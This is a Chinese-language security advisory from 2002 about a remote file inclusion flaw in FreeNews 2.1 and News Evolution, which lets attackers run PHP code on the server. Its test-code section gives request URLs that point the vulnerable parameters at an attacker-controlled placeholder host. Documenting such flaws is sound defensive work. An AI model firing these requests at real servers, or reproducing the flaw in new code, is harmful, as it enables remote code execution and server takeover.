|
|
FreeNews包含未定义变量命令可执行漏洞
发布时间:2002-11-26
更新时间:2002-11-26
严重程度:高
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:6258
受影响系统FreeNews FreeNews 2.1 详细描述
FreeNews是免费开放新闻源代码包,由PHP编写。
FreeNews由于程序设计错误,可导致攻击者可以包含远程服务器上的文件,如果文件中包含PHP代码,可使代码以WEB权限执行。
测试代码
a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...
b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...
c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php
解决方案
尚无
相关信息
"Frog Man" <leseulfrog@hotmail.com>.
参考:http://online.securityfocus.com/archive/1/301250
相关主页:http://www.frog-man.org/tutos/NEfree.txt
|
